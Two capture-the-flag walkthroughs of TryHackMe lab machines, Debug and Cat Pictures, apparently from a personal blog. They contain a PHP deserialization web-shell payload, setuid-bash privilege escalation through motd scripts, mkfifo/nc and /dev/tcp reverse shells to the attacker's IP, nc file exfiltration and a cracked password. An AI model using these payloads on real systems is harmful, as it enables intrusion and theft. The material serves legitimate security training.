Forem: hamzairshad02

TryHackMe: Debug - Walkthrough

hamzairshad02 — Sat, 23 Sep 2023 16:06:38 +0000

Machine Link: Debug

Starting off with nmap

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds

We find two ports; 22 (ssh) and 80 (http). Lets enumerate ssh first through the version that it is exposing and lets see if there’s an exploit to it.

Searching it up shows that it is vulnerable to username enumeration so lets launch metasploit and see if it can do something about it.

msf6 > search port:22 ssh enum

Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/cerberus_sftp_enumusers  2014-05-27       normal  No     Cerberus FTP Server SFTP Username Enumeration
   1  auxiliary/scanner/ssh/ssh_enumusers                             normal  No     SSH Username Enumeration

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_enumusers                                             

msf6 > use 1
msf6 auxiliary(scanner/ssh/ssh_enumusers) >

Searching up it shows that there is a ssh_enumusers scanner available so lets use it.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/legion/wordlists/ssh-user.txt
USER_FILE => /usr/share/legion/wordlists/ssh-user.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.10.69.115:22 - SSH - Using malformed packet technique
[*] 10.10.69.115:22 - SSH - Starting scan
[+] 10.10.69.115:22 - SSH - User 'root' found
[!] No active DB -- Credential data will not be saved!
[+] 10.10.69.115:22 - SSH - User 'sysop' found
[+] 10.10.69.115:22 - SSH - User 'admin' found
[+] 10.10.69.115:22 - SSH - User 'admnistrator' found
[+] 10.10.69.115:22 - SSH - User 'superuser' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Using the usual ssh-user.txt file present in Kali Linux it found all of these users to be the part of this machine. Well, that’s a little too much.

Checking out the port 80 it gives the typical Apache2 Ubuntu Default Page.

So we don’t have the password for ssh and the http port is just showing the default config page. What else can we do now? Start brute forcing things, right? Lets start with directory busting then.

┌──(kali㉿kali)-[~/dirsearch]
└─$ dirsearch -u http://10.10.69.115/ -t 100   

  _|. _ _  _  _  _ _|_    v0.4.2                                             
 (_||| _) (/_(_|| (_| )                                                      

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 10927                                                             

Output File: /home/kali/.dirsearch/reports/10.10.69.115/-_23-09-23_08-39-55.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-09-23_08-39-55.log

Target: http://10.10.69.115/

[08:39:56] Starting: 
[08:40:20] 403 -  277B  - /.htaccess.sample                                
[08:40:20] 403 -  277B  - /.htaccess_sc                                    
[08:40:20] 403 -  277B  - /.htaccessBAK                                    
[08:40:20] 403 -  277B  - /.htaccess.orig
[08:40:20] 403 -  277B  - /.htaccess_orig                                  
[08:40:20] 403 -  277B  - /.htaccess.save
[08:40:20] 403 -  277B  - /.htaccessOLD2                                   
[08:40:20] 403 -  277B  - /.htaccess_extra                                 
[08:40:20] 403 -  277B  - /.htm
[08:40:21] 403 -  277B  - /.htpasswds                                      
[08:40:21] 403 -  277B  - /.html                                           
[08:40:21] 403 -  277B  - /.htaccess.bak1                                  
[08:40:21] 403 -  277B  - /.ht_wsr.txt
[08:40:21] 403 -  277B  - /.htaccessOLD                                    
[08:40:21] 403 -  277B  - /.httr-oauth                                     
[08:40:22] 403 -  277B  - /.htpasswd_test                                  
[08:40:23] 403 -  277B  - /.php                                            
[08:40:24] 403 -  277B  - /.php3                                           
[08:40:57] 301 -  313B  - /backup  ->  http://10.10.69.115/backup/          
[08:40:57] 200 -    2KB - /backup/                                          
[08:41:19] 200 -   11KB - /index.html                                       
[08:41:19] 200 -    6KB - /index.php                                        
[08:41:19] 200 -    6KB - /index.php/login/                                 
[08:41:22] 301 -  317B  - /javascript  ->  http://10.10.69.115/javascript/  
[08:41:43] 200 -    2KB - /readme.md                                        
[08:41:46] 403 -  277B  - /server-status/                                   
[08:41:48] 403 -  277B  - /server-status                                    

Task Completed

Directory Busting through dirsearch did come up with some directories. Lets look into the most interesting one that is /index.php/login/

This page brings up a submit form. Throwing up XSS and SQL payloads won’t work. So lets dig deep and look for its code.

Viewing this page’s source will only give some useless HTML code. Lets find this index.php file somewhere else.

In our Directory Busting, /backup/ folder was found so lets see if it has the index.php file and it indeed has the backup file of it as index.php.bak.

<?php

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

public function SaveMessage() {

$NameArea = $_GET['name']; 
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

    $this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

}

public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';

}

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();

?>

Code gives a hint with the comments. So that must be where we should go further from. And as the description of machine said, we have to do PHP Deserialization so now is the time to do it.

The PHP code takes the name, email and comment passed in the GET by a form on the page. It uses those values to build a message that gets written to the file message.txt when the object is destructed. Lets test it out a little first by opening the following URL.

http://debug.thm/index.php?name=test&email=test&comments=test&select=1&checkbox=1

Then visiting this URL will validate our understanding.

http://debug.thm/message.txt

Now the part of code that has a comment on it tells us that if the URL contains a debug parameter, it will deserialize its content. That meant we could serialize an object of the class FormSubmit with the file and message we wanted. The server would then deserialize it, and when it would reach the end of the PHP block, the object would be out of scope and the class destructor would be called and our message would be written to the file of our choice.

So lets build a small code to fill in our shell.

<?php
class FormSubmit{
        public $form_file = 'test.php';
        public $message = '<?php system($_GET["cmd"]); ?>';
}
$obj = new FormSubmit();
echo serialize($obj);
?>

Testing it out it gives us the serialized object.

└─$ php testing.php
O:10:"FormSubmit":2:{s:9:"form_file";s:8:"test.php";s:7:"message";s:30:"<?php system($_GET["cmd"]); ?>";}

Now lets URL Encode it through CyberChef or any other URL Encoder and just use it with the debug parameter.

http://debug.thm/index.php?debug=O%3A10%3A"FormSubmit"%3A2%3A{s%3A9%3A"form_file"%3Bs%3A8%3A"test.php"%3Bs%3A7%3A"message"%3Bs%3A30%3A"<%3Fphp system(%24_GET["cmd"])%3B %3F>"%3B}

Lets visit the test.php file along with a command to see if our payload worked.

And it did. Running ls -al gives us a file called .htpasswd.

Looking into the file we see some goody good credentials.

The password seems like a hash so just crack it out.

└─$ john htpasswd.hash 
Created directory: /home/kali/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 20 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 15 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 23 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 21 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 13 candidates buffered for the current salt, minimum 24 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 14 candidates buffered for the current salt, minimum 24 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
jamaica          (james)
1g 0:00:00:00 DONE 2/3 (2023-09-23 10:57) 11.11g/s 20288p/s 20288c/s 20288C/s francine..me
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Saving the collected hash in a htpasswd.hash file and running it through John The Ripper gives us the password. This means its SSH time!

┌──(kali㉿kali)-[~]
└─$ ssh james@10.10.69.115                                                            255 ⨯
The authenticity of host '10.10.69.115 (10.10.69.115)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.69.115' (ECDSA) to the list of known hosts.
james@10.10.69.115's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

439 packages can be updated.
380 updates are security updates.

Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ ls
Desktop    Downloads         Music              Pictures  Templates  Videos
Documents  examples.desktop  Note-To-James.txt  Public    user.txt
james@osboxes:~$ cat user.txt
7e37c84a66cc40b1c6bf700d08d28c20

SSHing into the machine and opening user.txt gives us the first flag. Time to go to root now.

james@osboxes:~$ cat Note-To-James.txt
Dear James,

As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 

But there's still one thing I'd like you to do, before the submission.

Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root

Another file Note-To-James.txt is present inside the same directory which tells us the next steps. According to this note, we should be able to modify the Message Of The Day (motd).

james@osboxes:~$ ls -l /etc/update-motd.d/
total 28
-rwxrwxr-x 1 root james 1220 Mar 10  2021 00-header
-rwxrwxr-x 1 root james    0 Mar 10  2021 00-header.save
-rwxrwxr-x 1 root james 1157 Jun 14  2016 10-help-text
-rwxrwxr-x 1 root james   97 Dec  7  2018 90-updates-available
-rwxrwxr-x 1 root james  299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x 1 root james  142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x 1 root james  144 Dec  7  2018 98-reboot-required
-rwxrwxr-x 1 root james  604 Nov  5  2017 99-esm

We see that we have full rights to modify any of the file inside motd. Lets edit the very first file.

#!/bin/sh                                                                                                                                                               
cp /bin/bash /tmp/                                                                                                                                                      
chmod u+s /tmp/bash                                                                                                                                                     
#    00-header - create the header of the MOTD                                                                                                                          
#    Copyright (C) 2009-2010 Canonical Ltd.                                                                                                                             
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
        # Fall back to using the very slow lsb_release utility
        DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

I added two lines right beneath the shebang in the first line. Remember to use nano to edit the files since its the least painful of the command line text editors to exist.

Now just logout and SSH into the machine again to get your Message Of The Day (motd) and see if our added commands our gonna work to get root.

james@osboxes:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@osboxes:~$ /tmp/bash -p
bash-4.3# id
uid=1001(james) gid=1001(james) euid=0(root) groups=1001(james)

Now that we login again and run the /tmp/bash -p we see that we went from 1001 to 0 real quick. We are at the root!

bash-4.3# ls
Desktop  Documents  Downloads  examples.desktop  Music  Note-To-James.txt  Pictures  Public  Templates  user.txt  Videos
bash-4.3# cd ..
bash-4.3# ls
james  lost+found
bash-4.3# ls -al
total 28
drwxr-xr-x  4 root  root   4096 Mar 10  2021 .
drwxr-xr-x 24 root  root   4096 Feb 28  2019 ..
drwx------ 17 james james  4096 Mar 10  2021 james
drwx------  2 root  root  16384 Feb 28  2019 lost+found
bash-4.3# cd ..
bash-4.3# ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var  vmlinuz
bash-4.3# cd root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3c8c3d0fe758c320d158e32f68fabf4b

Navigating a little more just leads us to the root flag.

TryHackMe: Cat Pictures - Walkthrough

hamzairshad02 — Sun, 10 Sep 2023 11:17:08 +0000

Machine Link: Cat Pictures

I was just browsing through TryHackMe and this picture had me intrigued.

So I launched the machine, and started off with the warmup (i.e. Nmap).

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -v -A 10.10.248.4                       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-09 12:15 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating Ping Scan at 12:15
Scanning 10.10.248.4 [2 ports]
Completed Ping Scan at 12:15, 0.46s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:15
Completed Parallel DNS resolution of 1 host. at 12:15, 0.01s elapsed
Initiating Connect Scan at 12:15
Scanning 10.10.248.4 [1000 ports]
Discovered open port 22/tcp on 10.10.248.4
Discovered open port 8080/tcp on 10.10.248.4
Connect Scan Timing: About 31.35% done; ETC: 12:17 (0:01:08 remaining)
Increasing send delay for 10.10.248.4 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.248.4 from 5 to 10 due to max_successful_tryno increase to 6
Warning: 10.10.248.4 giving up on port because retransmission cap hit (6).
Completed Connect Scan at 12:16, 68.32s elapsed (1000 total ports)
Initiating Service scan at 12:16
Scanning 2 services on 10.10.248.4
Completed Service scan at 12:16, 10.91s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.248.4.
Initiating NSE at 12:16
Completed NSE at 12:17, 13.30s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 2.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.248.4
Host is up (0.42s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37436480d35a746281b7806b1a23d84a (RSA)
|   256 53c682efd27733efc13d9c1513540eb2 (ECDSA)
|_  256 ba97c323d4f2cc082ce12b3006189541 (ED25519)
163/tcp   filtered cmip-man
1236/tcp  filtered bvcontrol
1717/tcp  filtered fj-hdnet
2522/tcp  filtered windb
4550/tcp  filtered gds-adppiw-db
8080/tcp  open     http          Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Cat Pictures - Index page
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
49159/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.93 seconds

So this machine comes with a bunch of ports including 8080 so lets look into the website.

I was expecting forums full of cattos but oh well. Lets look further into it.

The website gives a hint of Knock knock! Magic Numbers: 1111, 2222, 3333, 4444 which seems like port numbers so lets try Port Knocking.

Port Knocking is basically trying to access a filtered port in order to unlock it open. I’m using a tool called knockd to hit the ports.

┌──(kali㉿kali)-[~]
└─$ knock 10.10.248.4 -v 1111 2222 3333 4444
hitting tcp 10.10.248.4:1111
hitting tcp 10.10.248.4:2222
hitting tcp 10.10.248.4:3333
hitting tcp 10.10.248.4:4444

After knocking on these ports lets do a nmap scan again and we’ll see ftp port now being opened.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.13.29.133
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|*End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|*-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt

The nmap scan even shows a note.txt file through the anonymous ftp login so after picking it up from the ftp it shows the following content.

In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is [password].
- catlover

The note straight up tells us to login to port 4420 with the given password.

┌──(kali㉿kali)-[~]
└─$ nc 10.10.248.4 4420                              
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
[password]
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr
ls home
catlover
ls home/catlover
runme

After logging in and roaming around a bit we find the shell to be a bit limited with a directory called catlover with a runme file inside.

./home/catlover/runme
THIS EXECUTABLE DOES NOT WORK UNDER THE INTERNAL SHELL, YOU NEED A REGULAR SHELL.

Upon running the file it asks us to run it with a Regular Shell. So lets try to get one.

ls usr/bin
mkfifo
touch
wget

Digging a little further, we see that the machine can run mkfifo, touch and wget. Since touch is to make files and wget and only get from ftp,http and https port we gotta go with mkfifo so lets take help from revshells.com and make a reverse shell using the nc mkfifo method.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.13.29.133 9001 >/tmp/f

Start a netcat listener and get the reverse shell.

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.248.4] 56820
sh: 0: can't access tty; job control turned off
# ls
bin
etc
home
lib
lib64
opt
tmp
usr

With the new shell. Lets pick the runme file by running the following command.

nc [YOUR MACHINE IP] 443 < home/catlover/runme

Then start a netcat listener on your machine.

nc -nlvp 443 > runme

After making the connection just Ctrl+C it and you’ll see the runme file on your machine.

┌──(kali㉿kali)-[~]
└─$ chmod +x runme

┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Access Denied

By trying to run it with the same old password it denies the access. Gotta analyze it. Lets use strings for that.

┌──(kali㉿kali)-[~]
└─$ strings runme                          
/lib64/ld-linux-x86-64.so.2
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZNSaIcED1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZSt3cin
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
_ZNSt8ios_base4InitD1Ev
_ZNSolsEPFRSoS_E
__gxx_personality_v0
_ZNSaIcEC1Ev
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZNSt8ios_base4InitC1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
_ZSt4cout
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE
_Unwind_Resume
__stack_chk_fail
__cxa_atexit
memcmp
system
__cxa_finalize
__libc_start_main
libstdc++.so.6
libgcc_s.so.1
libc.so.6
GCC_3.0
CXXABI_1.3
GLIBCXX_3.4.21
GLIBCXX_3.4
GLIBC_2.4
GLIBC_2.2.5
u+UH
ATSH
[A\]
[]A\A]A^A_
[password]
Please enter yout password: 
Welcome, catlover! SSH key transfer queued! 
touch /tmp/gibmethesshkey
Access Denied

With this, we can see the password so lets try it out.

┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!

By running it successfully it creates a file /tmp/gibmethesshkey in our tmp folder. The file is of no use to us so lets try running the runme file on the target machine with the password.

# ./home/catlover/runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!

After doing it, we see that a new id_rsa file has been created.

# ls /home/catlover
id_rsa
runme

id_rsa is a file that serves as a key when logging through ssh. As we see in our nmap scan that we do have a ssh port lets dive into it. Pick the file from server by the same netcat method and run it with ssh.

Pick the id_rsa file by running the following command.

nc [YOUR MACHINE IP] 443 < home/catlover/id_rsa

Then start a netcat listener on your machine.

nc -nlvp 443 > id_rsa

After making the connection just Ctrl+C it and you’ll see the id_rsa file on your machine. Fix the permissions on it.

┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa

Time to do ssh.

┌──(kali㉿kali)-[~]
└─$ ssh catlover@10.10.248.4 -i id_rsa
The authenticity of host '10.10.248.4 (10.10.248.4)' can't be established.
ED25519 key fingerprint is SHA256:1eaD00/uot2wrnOhWADr5ZbjIDs9twYBymqkwtQKXk0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.248.4' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Sep  9 11:15:03 PDT 2023

  System load:  0.79               Users logged in:                0
  Usage of /:   37.2% of 19.56GB   IP address for eth0:            10.10.248.4
  Memory usage: 34%                IP address for br-98674f8f20f9: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    109

52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/#

Aaaaand we got the shell.

root@7546fa2336d6:/# ls root
flag.txt
root@7546fa2336d6:/# cat root/flag.txt
[Flag 1]
root@7546fa2336d6:/# whoami
root

As we can see we got the root with the flag but is the Root Flag itself? Nope. Upon submitting it we see it as being accepted as Flag 1 and not the Root Flag.

That seems sus. Are we inside a docker container as root then? One way to find it out. Look for .dockerenv file in the / directory.

root@7546fa2336d6:/# ls -al
total 108
drwxr-xr-x   1 root root 4096 Mar 25  2021 .
drwxr-xr-x   1 root root 4096 Mar 25  2021 ..
-rw-------   1 root root  588 Jun  4  2021 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25  2021 .dockerenv

Got em! Time to escape this container then. Searching inside of it we find a /opt/clean/clean.sh file. This file seems to be editable so we’ll take advantage of reverse shell here.

root@7546fa2336d6:/opt/clean# echo "bash -i >& /dev/tcp/10.13.29.133/443 0>&1" >> clean.sh  
root@7546fa2336d6:/opt/clean# cat clean.sh
#!/bin/bash

rm -rf /tmp/*
bash -i >& /dev/tcp/10.13.29.133/443 0>&1

Adding a reverse shell into the file we now make it executable and run it.

root@7546fa2336d6:/opt/clean# chmod +x clean.sh
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May  1  2021 .
drwxrwxr-x 1 root root 4096 Mar 25  2021 ..
-rwxr-xr-x 1 root root   69 Sep 10 10:38 clean.sh
root@7546fa2336d6:/opt/clean# ./clean.sh

Now opening our netcat listener.

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.136.91] 54742
bash: cannot set terminal process group (2120): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# whoami
whoami
root
root@cat-pictures:~# hostname
hostname
cat-pictures

Now all we gotta do is see the flag and that’s the end of the road.

root@cat-pictures:~# ls
ls
firewall
root.txt
root@cat-pictures:~# cat root.txt
